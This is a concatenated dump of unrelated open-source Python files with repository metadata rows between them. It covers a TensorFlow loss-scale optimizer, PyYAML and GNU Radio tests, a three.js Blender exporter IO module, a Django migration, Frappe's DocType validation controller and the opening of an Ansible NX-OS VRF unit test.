def __init__(self, opt, loss_scale_manager):
"""Construct a loss scaling optimizer.
Args:
opt: The actual optimizer that will be used to compute and apply the
gradients. Must be an implementation of the `tf.train.Optimizer`
interface.
loss_scale_manager: A LossScaleManager object.
"""
self._opt = opt
self._loss_scale_manager = loss_scale_manager
def compute_gradients(self,
loss,
var_list=None,
gate_gradients=optimizer.Optimizer.GATE_OP,
aggregation_method=None,
colocate_gradients_with_ops=False,
grad_loss=None):
"""Compute gradients. See base class `tf.train.Optimizer`."""
loss_scale = self._loss_scale_manager.get_loss_scale()
if context.executing_eagerly():
def scaled_loss():
loss_val = loss()
return loss_val * math_ops.cast(loss_scale, loss_val.dtype.base_dtype)
else:
if callable(loss):
loss_val = loss()
else:
loss_val = loss
scaled_loss = loss_val * math_ops.cast(loss_scale,
loss_val.dtype.base_dtype)
grads_and_vars = self._opt.compute_gradients(
scaled_loss,
var_list=var_list,
gate_gradients=gate_gradients,
aggregation_method=aggregation_method,
colocate_gradients_with_ops=colocate_gradients_with_ops,
grad_loss=grad_loss)
return self._down_scale(grads_and_vars, loss_scale)
def apply_gradients(self, grads_and_vars, global_step=None, name=None):
"""Apply gradients. See base class `tf.train.Optimizer`."""
grads = [g for (g, _) in grads_and_vars]
is_finite_grad = []
for g in grads:
is_finite_grad.append(math_ops.reduce_all(gen_math_ops.is_finite(g)))
is_overall_finite = math_ops.reduce_all(is_finite_grad)
# Only update gradients when all grads are finite.
def true_apply_gradients_fn():
return self._opt.apply_gradients(grads_and_vars, global_step, name)
update_vars = control_flow_ops.cond(
is_overall_finite, true_apply_gradients_fn, gen_control_flow_ops.no_op)
# Potentially adjust gradient scale in case of finite gradients.
return control_flow_ops.group(
update_vars,
self._loss_scale_manager.update_loss_scale(is_overall_finite))
def _down_scale(self, grads_vars, loss_scale):
# Down scale grads by the loss_scale.
gv = []
inv_loss_scale = gen_math_ops.reciprocal(loss_scale)
for g, v in grads_vars:
if g is not None:
gv.append((g * math_ops.cast(inv_loss_scale, g.dtype.base_dtype), v))
else:
gv.append((g, v))
return gv
| apache-2.0 | -513,078,801,232,219,000 | 38.66474 | 80 | 0.694404 | false |
keedio/hue | desktop/core/ext-py/PyYAML-3.09/tests/lib/test_canonical.py | 60 | 1135 |
import yaml, canonical
def test_canonical_scanner(canonical_filename, verbose=False):
data = open(canonical_filename, 'rb').read()
tokens = list(yaml.canonical_scan(data))
assert tokens, tokens
if verbose:
for token in tokens:
print token
test_canonical_scanner.unittest = ['.canonical']
def test_canonical_parser(canonical_filename, verbose=False):
data = open(canonical_filename, 'rb').read()
events = list(yaml.canonical_parse(data))
assert events, events
if verbose:
for event in events:
print event
test_canonical_parser.unittest = ['.canonical']
def test_canonical_error(data_filename, canonical_filename, verbose=False):
data = open(data_filename, 'rb').read()
try:
output = list(yaml.canonical_load_all(data))
except yaml.YAMLError, exc:
if verbose:
print exc
else:
raise AssertionError("expected an exception")
test_canonical_error.unittest = ['.data', '.canonical']
test_canonical_error.skip = ['.empty']
if __name__ == '__main__':
import test_appliance
test_appliance.run(globals())
| apache-2.0 | -4,266,917,524,867,631,000 | 27.375 | 75 | 0.660793 | false |
Leeft/three.js | utils/exporters/blender/addons/io_three/exporter/io.py | 201 | 2836 | import os
import shutil
from .. import constants, logger
from . import _json
def copy_registered_textures(dest, registration):
"""Copy the registered textures to the destination (root) path
:param dest: destination directory
:param registration: registered textures
:type dest: str
:type registration: dict
"""
logger.debug("io.copy_registered_textures(%s, %s)", dest, registration)
os.makedirs(dest, exist_ok=True)
for value in registration.values():
copy(value['file_path'], dest)
def copy(src, dst):
"""Copy a file to a destination
:param src: source file
:param dst: destination file/path
"""
logger.debug("io.copy(%s, %s)" % (src, dst))
if os.path.isdir(dst):
file_name = os.path.basename(src)
dst = os.path.join(dst, file_name)
if src != dst:
shutil.copy(src, dst)
def dump(filepath, data, options=None):
"""Dump the output to disk (JSON, msgpack, etc)
:param filepath: output file path
:param data: serializable data to write to disk
:param options: (Default value = None)
:type options: dict
"""
options = options or {}
logger.debug("io.dump(%s, data, options=%s)", filepath, options)
compress = options.get(constants.COMPRESSION, constants.NONE)
if compress == constants.MSGPACK:
try:
import msgpack
except ImportError:
logger.error("msgpack module not found")
raise
logger.info("Dumping to msgpack")
func = lambda x, y: msgpack.dump(x, y)
mode = 'wb'
else:
round_off = options.get(constants.ENABLE_PRECISION)
if round_off:
_json.ROUND = options[constants.PRECISION]
else:
_json.ROUND = None
indent = options.get(constants.INDENT, True)
indent = 4 if indent else None
logger.info("Dumping to JSON")
func = lambda x, y: _json.json.dump(x, y, indent=indent)
mode = 'w'
logger.info("Writing to %s", filepath)
with open(filepath, mode=mode) as stream:
func(data, stream)
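# Usage sketch for dump() (the option values below are illustrative; the keys
# are the same `constants` members read above):
#
#   options = {
#       constants.COMPRESSION: constants.NONE,
#       constants.ENABLE_PRECISION: True,
#       constants.PRECISION: 6,
#       constants.INDENT: True
#   }
#   dump('/tmp/scene.json', {'metadata': {}}, options)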
def load(filepath, options):
"""Load the contents of the file path with the correct parser
:param filepath: input file path
:param options:
:type options: dict
"""
logger.debug("io.load(%s, %s)", filepath, options)
compress = options.get(constants.COMPRESSION, constants.NONE)
if compress == constants.MSGPACK:
try:
import msgpack
except ImportError:
logger.error("msgpack module not found")
raise
module = msgpack
mode = 'rb'
else:
logger.info("Loading JSON")
module = _json.json
mode = 'r'
with open(filepath, mode=mode) as stream:
data = module.load(stream)
return data
| mit | -6,637,956,004,533,076,000 | 26.009524 | 75 | 0.61213 | false |
michaelld/gnuradio | gr-blocks/python/blocks/qa_unpack_k_bits.py | 7 | 1845 | #!/usr/bin/env python
#
# Copyright 2006,2010,2013 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
from gnuradio import gr, gr_unittest, blocks
import random
class test_unpack(gr_unittest.TestCase):
def setUp(self):
random.seed(0)
self.tb = gr.top_block ()
def tearDown(self):
self.tb = None
def test_001(self):
src_data = (1,0,1,1,0,1,1,0)
expected_results = (1,0,1,1,0,1,1,0)
src = blocks.vector_source_b(src_data,False)
op = blocks.unpack_k_bits_bb(1)
dst = blocks.vector_sink_b()
self.tb.connect(src, op, dst)
self.tb.run()
self.assertEqual(expected_results, dst.data())
def test_002(self):
src_data = ( 2, 3, 0, 1)
expected_results = (1,0,1,1,0,0,0,1)
src = blocks.vector_source_b(src_data,False)
op = blocks.unpack_k_bits_bb(2)
dst = blocks.vector_sink_b()
self.tb.connect(src, op, dst)
self.tb.run()
self.assertEqual(expected_results, dst.data())
if __name__ == '__main__':
gr_unittest.run(test_unpack, "test_unpack.xml")
| gpl-3.0 | -7,482,672,415,865,631,000 | 30.271186 | 70 | 0.645528 | false |
lucidmotifs/codenamev | mediaplayer/migrations/0002_auto_20150211_0549.py | 1 | 4196 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('mediaplayer', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Channel',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=100)),
('description', models.CharField(max_length=255)),
('created', models.DateTimeField(verbose_name=b'Date Created')),
('modified', models.DateTimeField(verbose_name=b'Date Modified')),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Creator',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=50)),
('pseudo', models.CharField(max_length=50)),
('registered', models.DateTimeField(verbose_name=b'Date Registered')),
('avatar', models.ImageField(upload_to=b'')),
('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Episode',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('number', models.IntegerField()),
('rating', models.IntegerField()),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Season',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('number', models.IntegerField()),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Show',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=50)),
('rating', models.IntegerField()),
('created', models.DateTimeField(verbose_name=b'Date Created')),
('creator', models.ForeignKey(to='mediaplayer.Creator')),
('genre', models.ForeignKey(to='mediaplayer.Genre')),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Studio',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=50)),
('icon', models.ImageField(upload_to=b'')),
('creator', models.ForeignKey(to='mediaplayer.Creator')),
],
options={
},
bases=(models.Model,),
),
migrations.AddField(
model_name='show',
name='studio',
field=models.ForeignKey(to='mediaplayer.Studio'),
preserve_default=True,
),
migrations.AddField(
model_name='season',
name='show',
field=models.ForeignKey(to='mediaplayer.Show'),
preserve_default=True,
),
migrations.AddField(
model_name='episode',
name='season',
field=models.ForeignKey(to='mediaplayer.Season'),
preserve_default=True,
),
migrations.AddField(
model_name='episode',
name='show',
field=models.ForeignKey(to='mediaplayer.Show'),
preserve_default=True,
),
]
| mit | -286,532,153,139,026,600 | 35.807018 | 114 | 0.511916 | false |
VictoriaRoux/oppia | core/domain/value_generators_domain_test.py | 34 | 1211 | # coding: utf-8
#
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__author__ = 'Sean Lip'
from core.domain import value_generators_domain
import test_utils
class ValueGeneratorsUnitTests(test_utils.GenericTestBase):
"""Test the value generator registry."""
def test_value_generator_registry(self):
COPIER_ID = 'Copier'
copier = value_generators_domain.Registry.get_generator_class_by_id(
COPIER_ID)
self.assertEqual(copier().id, COPIER_ID)
all_generator_classes = (
value_generators_domain.Registry.get_all_generator_classes())
self.assertEqual(len(all_generator_classes), 4)
| apache-2.0 | -374,436,367,218,607,360 | 33.6 | 76 | 0.720066 | false |
anandpdoshi/frappe | frappe/core/doctype/doctype/doctype.py | 2 | 21596 | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import re
import MySQLdb
import frappe
from frappe import _
from frappe.utils import now, cint
from frappe.model import no_value_fields
from frappe.model.document import Document
from frappe.custom.doctype.property_setter.property_setter import make_property_setter
from frappe.desk.notifications import delete_notification_count_for
from frappe.modules import make_boilerplate
from frappe.model.db_schema import validate_column_name
class InvalidFieldNameError(frappe.ValidationError): pass
form_grid_templates = {
"fields": "templates/form_grid/fields.html"
}
class DocType(Document):
def get_feed(self):
return self.name
def validate(self):
"""Validate DocType before saving.
- Check if developer mode is set.
- Validate series
- Check fieldnames (duplication etc)
- Clear permission table for child tables
		- Add `amended_from` and `amended_by` if Amendable"""
self.check_developer_mode()
self.validate_name()
if self.issingle:
self.allow_import = 0
self.is_submittable = 0
self.istable = 0
elif self.istable:
self.allow_import = 0
self.validate_series()
self.scrub_field_names()
self.validate_document_type()
validate_fields(self)
if self.istable:
# no permission records for child table
self.permissions = []
else:
validate_permissions(self)
self.make_amendable()
self.validate_website()
def check_developer_mode(self):
"""Throw exception if not developer mode or via patch"""
if frappe.flags.in_patch:
return
if not frappe.conf.get("developer_mode") and not self.custom:
frappe.throw(_("Not in Developer Mode! Set in site_config.json or make 'Custom' DocType."))
def validate_document_type(self):
if self.document_type=="Transaction":
self.document_type = "Document"
if self.document_type=="Master":
self.document_type = "Setup"
def validate_website(self):
"""Ensure that website generator has field 'route'"""
from frappe.model.base_document import get_controller
try:
controller = get_controller(self.name)
except:
controller = None
if controller and getattr(controller, 'website', None):
if not 'route' in [d.fieldname for d in self.fields]:
frappe.throw('Field "route" is mandatory for Website Generator pages', title='Missing Field')
def change_modified_of_parent(self):
"""Change the timestamp of parent DocType if the current one is a child to clear caches."""
if frappe.flags.in_import:
return
parent_list = frappe.db.sql("""SELECT parent
from tabDocField where fieldtype="Table" and options=%s""", self.name)
for p in parent_list:
frappe.db.sql('UPDATE tabDocType SET modified=%s WHERE `name`=%s', (now(), p[0]))
def scrub_field_names(self):
"""Sluggify fieldnames if not set from Label."""
restricted = ('name','parent','creation','modified','modified_by',
'parentfield','parenttype',"file_list")
for d in self.get("fields"):
if d.fieldtype:
if (not getattr(d, "fieldname", None)):
if d.label:
d.fieldname = d.label.strip().lower().replace(' ','_')
if d.fieldname in restricted:
d.fieldname = d.fieldname + '1'
else:
d.fieldname = d.fieldtype.lower().replace(" ","_") + "_" + str(d.idx)
# fieldnames should be lowercase
d.fieldname = d.fieldname.lower()
def validate_series(self, autoname=None, name=None):
"""Validate if `autoname` property is correctly set."""
if not autoname: autoname = self.autoname
if not name: name = self.name
if not autoname and self.get("fields", {"fieldname":"naming_series"}):
self.autoname = "naming_series:"
if autoname and (not autoname.startswith('field:')) \
and (not autoname.startswith('eval:')) \
and (not autoname.lower() in ('prompt', 'hash')) \
and (not autoname.startswith('naming_series:')):
prefix = autoname.split('.')[0]
used_in = frappe.db.sql('select name from tabDocType where substring_index(autoname, ".", 1) = %s and name!=%s', (prefix, name))
if used_in:
frappe.throw(_("Series {0} already used in {1}").format(prefix, used_in[0][0]))
def on_update(self):
"""Update database schema, make controller templates if `custom` is not set and clear cache."""
from frappe.model.db_schema import updatedb
updatedb(self.name, self)
self.change_modified_of_parent()
make_module_and_roles(self)
from frappe import conf
if not self.custom and not (frappe.flags.in_import or frappe.flags.in_test) and conf.get('developer_mode'):
self.export_doc()
self.make_controller_template()
# update index
if not self.custom:
self.run_module_method("on_doctype_update")
if self.flags.in_insert:
self.run_module_method("after_doctype_insert")
delete_notification_count_for(doctype=self.name)
frappe.clear_cache(doctype=self.name)
def run_module_method(self, method):
from frappe.modules import load_doctype_module
module = load_doctype_module(self.name, self.module)
if hasattr(module, method):
getattr(module, method)()
def before_rename(self, old, new, merge=False):
"""Throw exception if merge. DocTypes cannot be merged."""
if not self.custom and frappe.session.user != "Administrator":
frappe.throw(_("DocType can only be renamed by Administrator"))
self.check_developer_mode()
self.validate_name(new)
if merge:
frappe.throw(_("DocType can not be merged"))
def after_rename(self, old, new, merge=False):
"""Change table name using `RENAME TABLE` if table exists. Or update
`doctype` property for Single type."""
if self.issingle:
frappe.db.sql("""update tabSingles set doctype=%s where doctype=%s""", (new, old))
else:
frappe.db.sql("rename table `tab%s` to `tab%s`" % (old, new))
def before_reload(self):
"""Preserve naming series changes in Property Setter."""
if not (self.issingle and self.istable):
self.preserve_naming_series_options_in_property_setter()
def preserve_naming_series_options_in_property_setter(self):
"""Preserve naming_series as property setter if it does not exist"""
naming_series = self.get("fields", {"fieldname": "naming_series"})
if not naming_series:
return
		# check if at least 1 record exists
if not (frappe.db.table_exists(self.name) and frappe.db.sql("select name from `tab{}` limit 1".format(self.name))):
return
existing_property_setter = frappe.db.get_value("Property Setter", {"doc_type": self.name,
"property": "options", "field_name": "naming_series"})
if not existing_property_setter:
make_property_setter(self.name, "naming_series", "options", naming_series[0].options, "Text", validate_fields_for_doctype=False)
if naming_series[0].default:
make_property_setter(self.name, "naming_series", "default", naming_series[0].default, "Text", validate_fields_for_doctype=False)
def export_doc(self):
"""Export to standard folder `[module]/doctype/[name]/[name].json`."""
from frappe.modules.export_file import export_to_files
export_to_files(record_list=[['DocType', self.name]])
def import_doc(self):
"""Import from standard folder `[module]/doctype/[name]/[name].json`."""
from frappe.modules.import_module import import_from_files
import_from_files(record_list=[[self.module, 'doctype', self.name]])
def make_controller_template(self):
"""Make boilderplate controller template."""
make_boilerplate("controller.py", self)
if not (self.istable or self.issingle):
make_boilerplate("test_controller.py", self.as_dict())
if not self.istable:
make_boilerplate("controller.js", self.as_dict())
def make_amendable(self):
"""If is_submittable is set, add amended_from docfields."""
if self.is_submittable:
if not frappe.db.sql("""select name from tabDocField
where fieldname = 'amended_from' and parent = %s""", self.name):
self.append("fields", {
"label": "Amended From",
"fieldtype": "Link",
"fieldname": "amended_from",
"options": self.name,
"read_only": 1,
"print_hide": 1,
"no_copy": 1
})
def get_max_idx(self):
"""Returns the highest `idx`"""
max_idx = frappe.db.sql("""select max(idx) from `tabDocField` where parent = %s""",
self.name)
return max_idx and max_idx[0][0] or 0
def validate_name(self, name=None):
if not name:
name = self.name
# a DocType's name should not start with a number or underscore
# and should only contain letters, numbers and underscore
is_a_valid_name = re.match("^(?![\W])[^\d_\s][\w -]+$", name, re.UNICODE)
if not is_a_valid_name:
frappe.throw(_("DocType's name should start with a letter and it can only consist of letters, numbers, spaces and underscores"), frappe.NameError)
def validate_fields_for_doctype(doctype):
validate_fields(frappe.get_meta(doctype, cached=False))
# this is separate because it is also called via custom field
def validate_fields(meta):
"""Validate doctype fields. Checks
1. There are no illegal characters in fieldnames
2. If fieldnames are unique.
3. Fields that do have database columns are not mandatory.
4. `Link` and `Table` options are valid.
5. **Hidden** and **Mandatory** are not set simultaneously.
7. `Check` type field has default as 0 or 1.
8. `Dynamic Links` are correctly defined.
9. Precision is set in numeric fields and is between 1 & 6.
10. Fold is not at the end (if set).
11. `search_fields` are valid.
12. `title_field` and title field pattern are valid.
13. `unique` check is only valid for Data, Link and Read Only fieldtypes.
14. `unique` cannot be checked if there exist non-unique values.
:param meta: `frappe.model.meta.Meta` object to check."""
def check_illegal_characters(fieldname):
validate_column_name(fieldname)
def check_unique_fieldname(fieldname):
duplicates = filter(None, map(lambda df: df.fieldname==fieldname and str(df.idx) or None, fields))
if len(duplicates) > 1:
frappe.throw(_("Fieldname {0} appears multiple times in rows {1}").format(fieldname, ", ".join(duplicates)))
def check_illegal_mandatory(d):
if (d.fieldtype in no_value_fields) and d.fieldtype!="Table" and d.reqd:
frappe.throw(_("Field {0} of type {1} cannot be mandatory").format(d.label, d.fieldtype))
def check_link_table_options(d):
if d.fieldtype in ("Link", "Table"):
if not d.options:
frappe.throw(_("Options requried for Link or Table type field {0} in row {1}").format(d.label, d.idx))
if d.options=="[Select]" or d.options==d.parent:
return
if d.options != d.parent:
options = frappe.db.get_value("DocType", d.options, "name")
if not options:
frappe.throw(_("Options must be a valid DocType for field {0} in row {1}").format(d.label, d.idx))
else:
# fix case
d.options = options
def check_hidden_and_mandatory(d):
if d.hidden and d.reqd and not d.default:
frappe.throw(_("Field {0} in row {1} cannot be hidden and mandatory without default").format(d.label, d.idx))
def check_width(d):
if d.fieldtype == "Currency" and cint(d.width) < 100:
frappe.throw(_("Max width for type Currency is 100px in row {0}").format(d.idx))
def check_in_list_view(d):
if d.in_list_view and (d.fieldtype in no_value_fields):
frappe.throw(_("'In List View' not allowed for type {0} in row {1}").format(d.fieldtype, d.idx))
def check_dynamic_link_options(d):
if d.fieldtype=="Dynamic Link":
doctype_pointer = filter(lambda df: df.fieldname==d.options, fields)
if not doctype_pointer or (doctype_pointer[0].fieldtype not in ("Link", "Select")) \
or (doctype_pointer[0].fieldtype=="Link" and doctype_pointer[0].options!="DocType"):
frappe.throw(_("Options 'Dynamic Link' type of field must point to another Link Field with options as 'DocType'"))
def check_illegal_default(d):
if d.fieldtype == "Check" and d.default and d.default not in ('0', '1'):
frappe.throw(_("Default for 'Check' type of field must be either '0' or '1'"))
if d.fieldtype == "Select" and d.default and (d.default not in d.options.split("\n")):
frappe.throw(_("Default for {0} must be an option").format(d.fieldname))
def check_precision(d):
if d.fieldtype in ("Currency", "Float", "Percent") and d.precision is not None and not (1 <= cint(d.precision) <= 6):
frappe.throw(_("Precision should be between 1 and 6"))
def check_unique_and_text(d):
if meta.issingle:
d.unique = 0
d.search_index = 0
if getattr(d, "unique", False):
if d.fieldtype not in ("Data", "Link", "Read Only"):
frappe.throw(_("Fieldtype {0} for {1} cannot be unique").format(d.fieldtype, d.label))
if not d.get("__islocal"):
try:
has_non_unique_values = frappe.db.sql("""select `{fieldname}`, count(*)
from `tab{doctype}` group by `{fieldname}` having count(*) > 1 limit 1""".format(
doctype=d.parent, fieldname=d.fieldname))
except MySQLdb.OperationalError, e:
if e.args and e.args[0]==1054:
# ignore if missing column, else raise
# this happens in case of Custom Field
pass
else:
raise
else:
# else of try block
if has_non_unique_values and has_non_unique_values[0][0]:
frappe.throw(_("Field '{0}' cannot be set as Unique as it has non-unique values").format(d.label))
if d.search_index and d.fieldtype in ("Text", "Long Text", "Small Text", "Code", "Text Editor"):
frappe.throw(_("Fieldtype {0} for {1} cannot be indexed").format(d.fieldtype, d.label))
def check_fold(fields):
fold_exists = False
for i, f in enumerate(fields):
if f.fieldtype=="Fold":
if fold_exists:
frappe.throw(_("There can be only one Fold in a form"))
fold_exists = True
if i < len(fields)-1:
nxt = fields[i+1]
if nxt.fieldtype != "Section Break":
frappe.throw(_("Fold must come before a Section Break"))
else:
frappe.throw(_("Fold can not be at the end of the form"))
def check_search_fields(meta):
"""Throw exception if `search_fields` don't contain valid fields."""
if not meta.search_fields:
return
fieldname_list = [d.fieldname for d in fields]
for fieldname in (meta.search_fields or "").split(","):
fieldname = fieldname.strip()
if fieldname not in fieldname_list:
frappe.throw(_("Search field {0} is not valid").format(fieldname))
def check_title_field(meta):
"""Throw exception if `title_field` isn't a valid fieldname."""
if not meta.get("title_field"):
return
fieldname_list = [d.fieldname for d in fields]
if meta.title_field not in fieldname_list:
frappe.throw(_("Title field must be a valid fieldname"), InvalidFieldNameError)
def _validate_title_field_pattern(pattern):
if not pattern:
return
for fieldname in re.findall("{(.*?)}", pattern, re.UNICODE):
if fieldname.startswith("{"):
# edge case when double curlies are used for escape
continue
if fieldname not in fieldname_list:
frappe.throw(_("{{{0}}} is not a valid fieldname pattern. It should be {{field_name}}.").format(fieldname),
InvalidFieldNameError)
df = meta.get("fields", filters={"fieldname": meta.title_field})[0]
if df:
_validate_title_field_pattern(df.options)
_validate_title_field_pattern(df.default)
def check_image_field(meta):
'''check image_field exists and is of type "Attach Image"'''
if not meta.image_field:
return
df = meta.get("fields", {"fieldname": meta.image_field})
if not df:
frappe.throw(_("Image field must be a valid fieldname"), InvalidFieldNameError)
if df[0].fieldtype != 'Attach Image':
frappe.throw(_("Image field must be of type Attach Image"), InvalidFieldNameError)
def check_timeline_field(meta):
if not meta.timeline_field:
return
fieldname_list = [d.fieldname for d in fields]
if meta.timeline_field not in fieldname_list:
frappe.throw(_("Timeline field must be a valid fieldname"), InvalidFieldNameError)
df = meta.get("fields", {"fieldname": meta.timeline_field})[0]
if df.fieldtype not in ("Link", "Dynamic Link"):
frappe.throw(_("Timeline field must be a Link or Dynamic Link"), InvalidFieldNameError)
fields = meta.get("fields")
for d in fields:
if not d.permlevel: d.permlevel = 0
if not d.fieldname:
frappe.throw(_("Fieldname is required in row {0}").format(d.idx))
d.fieldname = d.fieldname.lower()
check_illegal_characters(d.fieldname)
check_unique_fieldname(d.fieldname)
check_illegal_mandatory(d)
check_link_table_options(d)
check_dynamic_link_options(d)
check_hidden_and_mandatory(d)
check_in_list_view(d)
check_illegal_default(d)
check_unique_and_text(d)
check_fold(fields)
check_search_fields(meta)
check_title_field(meta)
check_timeline_field(meta)
def validate_permissions_for_doctype(doctype, for_remove=False):
"""Validates if permissions are set correctly."""
doctype = frappe.get_doc("DocType", doctype)
if frappe.conf.developer_mode and not frappe.flags.in_test:
# save doctype
doctype.save()
else:
validate_permissions(doctype, for_remove)
# save permissions
for perm in doctype.get("permissions"):
perm.db_update()
def validate_permissions(doctype, for_remove=False):
permissions = doctype.get("permissions")
if not permissions:
frappe.throw(_('Enter at least one permission row'), frappe.MandatoryError)
issingle = issubmittable = isimportable = False
if doctype:
issingle = cint(doctype.issingle)
issubmittable = cint(doctype.is_submittable)
isimportable = cint(doctype.allow_import)
def get_txt(d):
return _("For {0} at level {1} in {2} in row {3}").format(d.role, d.permlevel, d.parent, d.idx)
def check_atleast_one_set(d):
if not d.read and not d.write and not d.submit and not d.cancel and not d.create:
frappe.throw(_("{0}: No basic permissions set").format(get_txt(d)))
def check_double(d):
has_similar = False
similar_because_of = ""
for p in permissions:
if p.role==d.role and p.permlevel==d.permlevel and p!=d:
if p.apply_user_permissions==d.apply_user_permissions:
has_similar = True
similar_because_of = _("Apply User Permissions")
break
elif p.if_owner==d.if_owner:
similar_because_of = _("If Owner")
has_similar = True
break
if has_similar:
frappe.throw(_("{0}: Only one rule allowed with the same Role, Level and {1}")\
.format(get_txt(d), similar_because_of))
def check_level_zero_is_set(d):
if cint(d.permlevel) > 0 and d.role != 'All':
has_zero_perm = False
for p in permissions:
if p.role==d.role and (p.permlevel or 0)==0 and p!=d:
has_zero_perm = True
break
if not has_zero_perm:
frappe.throw(_("{0}: Permission at level 0 must be set before higher levels are set").format(get_txt(d)))
for invalid in ("create", "submit", "cancel", "amend"):
if d.get(invalid): d.set(invalid, 0)
def check_permission_dependency(d):
if d.cancel and not d.submit:
frappe.throw(_("{0}: Cannot set Cancel without Submit").format(get_txt(d)))
if (d.submit or d.cancel or d.amend) and not d.write:
frappe.throw(_("{0}: Cannot set Submit, Cancel, Amend without Write").format(get_txt(d)))
		if d.amend and not d.cancel:
frappe.throw(_("{0}: Cannot set Amend without Cancel").format(get_txt(d)))
if d.get("import") and not d.create:
frappe.throw(_("{0}: Cannot set Import without Create").format(get_txt(d)))
def remove_rights_for_single(d):
if not issingle:
return
if d.report:
frappe.msgprint(_("Report cannot be set for Single types"))
d.report = 0
d.set("import", 0)
d.set("export", 0)
for ptype, label in (
("set_user_permissions", _("Set User Permissions")),
("apply_user_permissions", _("Apply User Permissions"))):
if d.get(ptype):
d.set(ptype, 0)
frappe.msgprint(_("{0} cannot be set for Single types").format(label))
def check_if_submittable(d):
if d.submit and not issubmittable:
frappe.throw(_("{0}: Cannot set Assign Submit if not Submittable").format(get_txt(d)))
elif d.amend and not issubmittable:
frappe.throw(_("{0}: Cannot set Assign Amend if not Submittable").format(get_txt(d)))
def check_if_importable(d):
if d.get("import") and not isimportable:
frappe.throw(_("{0}: Cannot set import as {1} is not importable").format(get_txt(d), doctype))
for d in permissions:
if not d.permlevel:
d.permlevel=0
check_atleast_one_set(d)
if not for_remove:
check_double(d)
check_permission_dependency(d)
check_if_submittable(d)
check_if_importable(d)
check_level_zero_is_set(d)
remove_rights_for_single(d)
def make_module_and_roles(doc, perm_fieldname="permissions"):
"""Make `Module Def` and `Role` records if already not made. Called while installing."""
try:
if not frappe.db.exists("Module Def", doc.module):
m = frappe.get_doc({"doctype": "Module Def", "module_name": doc.module})
m.app_name = frappe.local.module_app[frappe.scrub(doc.module)]
m.flags.ignore_mandatory = m.flags.ignore_permissions = True
m.insert()
default_roles = ["Administrator", "Guest", "All"]
roles = [p.role for p in doc.get("permissions") or []] + default_roles
for role in list(set(roles)):
if not frappe.db.exists("Role", role):
r = frappe.get_doc({"doctype": "Role", "role_name": role})
r.role_name = role
r.flags.ignore_mandatory = r.flags.ignore_permissions = True
r.insert()
except frappe.DoesNotExistError, e:
pass
except frappe.SQLError, e:
if e.args[0]==1146:
pass
else:
raise
def init_list(doctype):
"""Make boilerplate list views."""
doc = frappe.get_meta(doctype)
make_boilerplate("controller_list.js", doc)
make_boilerplate("controller_list.html", doc)
| mit | -1,331,930,829,922,321,200 | 34.519737 | 149 | 0.688461 | false |
t794104/ansible | test/units/modules/network/nxos/test_nxos_vrf.py | 68 | 3059 | # (c) 2016 Red Hat Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from units.compat.mock import patch
from ansible.modules.network.nxos import nxos_vrf
from .nxos_module import TestNxosModule, load_fixture, set_module_args
class TestNxosVrfModule(TestNxosModule):
module = nxos_vrf
def setUp(self):
super(TestNxosVrfModule, self).setUp()
self.mock_load_config = patch('ansible.modules.network.nxos.nxos_vrf.load_config')
self.load_config = self.mock_load_config.start()
self.mock_run_commands = patch('ansible.modules.network.nxos.nxos_vrf.run_commands')
self.run_commands = self.mock_run_commands.start()
def tearDown(self):
super(TestNxosVrfModule, self).tearDown()
self.mock_load_config.stop()
self.mock_run_commands.stop()
def load_fixtures(self, commands=None, device=''):
def load_from_file(*args, **kwargs):
module, commands = args
output = list()
for command in commands:
if isinstance(command, dict):
command = command['command']
filename = str(command).split(' | ')[0].replace(' ', '_')
output.append(load_fixture('nxos_vrf', filename))
return output
self.load_config.return_value = None
self.run_commands.side_effect = load_from_file
